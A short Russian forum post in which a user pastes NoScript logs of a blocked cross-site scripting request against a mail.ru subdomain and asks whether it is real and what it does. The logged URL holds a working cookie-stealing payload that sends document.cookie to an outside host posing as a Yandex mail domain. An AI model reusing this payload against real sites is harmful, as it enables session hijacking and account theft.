Скрин http://i.pixs.ru/storage/8/0/3/xsspng_1640134_9974803.png Данные с консоли 1 --- [NoScript InjectionChecker] JavaScript Injection in ///data-mrc-config%22%27%3E%3E%3Cinput%3E%3Cscript%3Eimg.src=location.hash.slice(1)+document.cookie;//**/%3C/script%3E/*%3Cinput%3E%3Cp#http://yandex-mail.pw/sn/s.php? (function anonymous() { location.hash.slice(1)+document.cookie /* COMMENT_TERMINATOR */ DUMMY_EXPR }) 2 --- [NoScript XSS] Отфильтрован подозрительный запрос. URL: [https://krugdoveriya.mail.ru/data-mrc-config%22%27%3E%3E%3Cinput%3E%3Cscript%3Eimg.src=location.hash.slice(1)+document.cookie;//**/%3C/script%3E/*%3Cinput%3E%3Cp#http://yandex-mail.pw/sn/s.php?]. Запрос последовал со страницы: [http://o5sms.ru/]. Отфильтрованный адрес: [https://krugdoveriya.mail.ru/data-mrc-config%20%20%3E%3E%20input%3E%20script%3Eimg.src%20LOCATION.hash.slice%201%20+DOCUMENT.COOKIE;//**/%20/script%3E/*%20input%3E%20p#5783861931061425911] 3 --- krugdoveriya.mail.ru : server does not support RFC 5746, see CVE-2009-3555 Интересно узнать, это реально XSS, или нет, и что она делает, ну хочет сделать?
Спасибо, за ответ. Было интересно узнать. А насколько давно, она перестала работать, примерно хотя бы?
